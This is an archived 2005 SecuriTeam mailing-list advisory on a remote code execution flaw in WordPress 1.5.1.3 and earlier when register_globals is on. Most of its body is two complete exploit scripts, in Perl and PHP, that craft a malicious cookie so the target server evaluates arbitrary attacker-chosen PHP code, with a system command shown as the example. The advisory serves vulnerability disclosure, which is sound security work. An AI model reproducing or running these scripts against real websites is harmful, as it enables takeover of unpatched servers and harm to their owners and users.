[UNIX] WordPress Command Execution Vulnerability (Cache_lastpostdate)

From: SecuriTeam (support_at_securiteam.com)
Date: 08/10/05

  • Next message: SecuriTeam: "[EXPL] Windows 2000 Plug and Play Universal Exploit (MS05-039)" 
    To: list@securiteam.com
Date: 10 Aug 2005 18:17:45 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      WordPress Command Execution Vulnerability (Cache_lastpostdate)
    ------------------------------------------------------------------------

    SUMMARY

    A vulnerability in WordPress's handling of incoming cookie information
    allows remote attackers to cause the program to execute arbitrary code if
    the PHP settings of register_globals has been set to On.

    DETAILS

    Vulnerable Systems:
     * WordPress version 1.5.1.3 and prior (with register_globals)

    Immune Systems:
     * WordPress version 1.5.1.4 or newer

    Perl Exploit:
    #!/usr/bin/perl
    use strict;
    use MIME::Base64 qw(encode_base64 decode_base64);
    use IO::Socket;

    print "Wordpress <= 1.5.1.3 - remote code execution 0-DDAAYY exploit
    (Converted by Noam)\n";
    print "(C) Copyright 2005 Kartoffelguru\n\n";
    print "[!] info: requires register_globals turned on on target host\n\n";

    if (@ARGV < 2)
    {
     die ("usage:\n\t./wpx.php http://www.xyz.net/blog/ 'system(\"uname
    -a;id\");'\n\n");
    }

    my $url = shift;
    my $cmd = shift;

    if (length($cmd)==0)
    {
     $cmd = 'phpinfo();';
    }

    #print "code: ".encode_base64($cmd, '')."\n";
    my @code = unpack("C*", encode_base64($cmd, ''));
    #print "code: @code\n";
    my $cnv = "";
    for (my $i=0;$i<@code; $i++)
    {
     $cnv.= "chr(".$code[$i].").";
    }
    $cnv.="chr(32)";
    #print "cnv: $cnv\n";

    my $str =
    encode_base64('args[0]=eval(base64_decode('.$cnv.')).die()&args[1]=x',
    '');
    #print "str: [$str]\n";

    my $cookie='wp_filter[query_vars][0][0][function]=get_lastpostdate;".
    "wp_filter[query_vars][0][0][accepted_args]=0;';
    $cookie.='wp_filter[query_vars][0][1][function]=base64_decode;".
    "wp_filter[query_vars][0][1][accepted_args]=1;';
    $cookie.='cache_lastpostmodified[server]=//e;cache_lastpostdate[server]=';
    $cookie.=$str;
    $cookie.=';wp_filter[query_vars][1][0][function]=parse_str;".
    "wp_filter[query_vars][1][0][accepted_args]=1;';
    $cookie.='wp_filter[query_vars][2][0][function]=get_lastpostmodified;" .
    "wp_filter[query_vars][2][0][accepted_args]=0;';
    $cookie.='wp_filter[query_vars][3][0][function]=preg_replace;" .
    "wp_filter[query_vars][3][0][accepted_args]=3;';

    $url =~ /http:\/\/([^\/]+)\/(.*?)/;

    my $hostname = $1;

    my $path = $2;
    my $Request = "GET /$path HTTP/1.1\r
    Host: $hostname\r
    Cookie: $cookie\r
    Referer: $hostname\r
    Connection: close\r
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET
    CLR 1.1.4322)\r
    \r
    ";

    my $socket = IO::Socket::INET->new ( Proto => "tcp", PeerAddr =>
    $hostname, PeerPort => 80);
    unless ($socket) { die "cannot connect to http daemon on $hostname" }

    print "Request: [$Request]\n";
    print $socket $Request;

    while (<$socket>)
    {
     print $_;
    }

    PHP Exploit:
    <?php
        echo "Wordpress <= 1.5.1.3 - remote code execution 0-DDAAYY
    exploit\n";
        echo "(C) Copyright 2005 Kartoffelguru\n\n";
        echo "[!] info: requires register_globals turned on on target
    host\n\n";
        if (!extension_loaded('curl')) {
            die ("[-] you need the curl extension activated...\n");
        }

        function usage()
        {
            die ("usage:\n\t./wpx.php -h http://www.xyz.net/blog/ -c
    'system(\"uname -a;id\");'\n\n");
        }

        $options = getopt("h:c:");
        if (count($options) < 1 || !isset($options['h'])) {
            usage();
        }

        $host = (is_array($options['h']) ? $options['h'][0]:$options['h']);
        $cmd = (is_array($options['c']) ? $options['c'][0]:$options['c']);

        if (!preg_match("/^http:\/\//", $host, $dummy)) {
            usage();
        }

        if (strlen(trim($cmd))==0) {
            $cmd = 'phpinfo();';
        }

        $code = base64_encode($cmd);
        echo "code: $code\n";
        $cnv = "";
        for ($i=0;$i<strlen($code); $i++) {
            $cnv.= "chr(".ord($code[$i]).").";
        }
        $cnv.="chr(32)";
        echo "cnv: $cnv\n";

        $str =
    base64_encode('args[0]=eval(base64_decode('.$cnv.')).die()&args[1]=x');

        $cookie='wp_filter[query_vars][0][0][function]=get_lastpostdate;' .
    'wp_filter[query_vars][0][0][accepted_args]=0;';
        $cookie.='wp_filter[query_vars][0][1][function]=base64_decode;' .
    'wp_filter[query_vars][0][1][accepted_args]=1;';
        
    $cookie.='cache_lastpostmodified[server]=//e;cache_lastpostdate[server]=';
        $cookie.=$str;
        $cookie.=';wp_filter[query_vars][1][0][function]=parse_str;' .
    'wp_filter[query_vars][1][0][accepted_args]=1;';
        $cookie.='wp_filter[query_vars][2][0][function]=get_lastpostmodified;'
     'wp_filter[query_vars][2][0][accepted_args]=0;';
        $cookie.='wp_filter[query_vars][3][0][function]=preg_replace;' .
    'wp_filter[query_vars][3][0][accepted_args]=3;';

        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $host);
        curl_setopt($ch, CURLOPT_POST, 0);
        curl_setopt($ch, CURLOPT_COOKIE, $cookie);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_CURLOPT_REFERER, $host);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE
    6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)");
        curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);
        echo "[+] now executing\n\n";

        $r = curl_exec($ch);
        curl_close($ch);

        echo $r;

    ?>

    ADDITIONAL INFORMATION

    The information has been provided by Kartoffelguru.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[EXPL] Windows 2000 Plug and Play Universal Exploit (MS05-039)"

    Relevant Pages

    • [UNIX] Multiple Vulnerabilities within PHP 4/5 (pack, unpack, safe_mode_exec_dir, safe_mode, realpat
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... PHP is "a widely-used general-purpose scripting language that is ... several vulnerabilities within PHP were ... unserialize() - Wrong Handling of Negative References ...
      (Securiteam)
    • [UNIX] Dotdeb PHP Email Header Injection Vulnerability
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Dotdeb PHP Email Header Injection Vulnerability ... This patch adds an X-PHP-Script header to ...
      (Securiteam)
    • [NEWS] PHP getimagesize() Multiple DoS Vulnerabilities
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... PHP is a widely-used general-purpose scripting language that is especially ... Remote exploitation of a denial of service condition in the PHP ... Local exploitation of an input validation vulnerability in The PHP Group's ...
      (Securiteam)
    • [UNIX] PHP 5.1.6 / 4.4.4 Critical php_admin* Bypass by ini_restore()
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... There is a privilage escalation vulnerability in PHP. ... Used to set a boolean configuration directive. ... can not be overridden by .htaccess or virtualhost directives. ...
      (Securiteam)
    • [UNIX] PHP Globals Filtering Bypass
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... PHP Globals Filtering Bypass ... Please note that the PHP globals must be on in order to be vulnerable. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)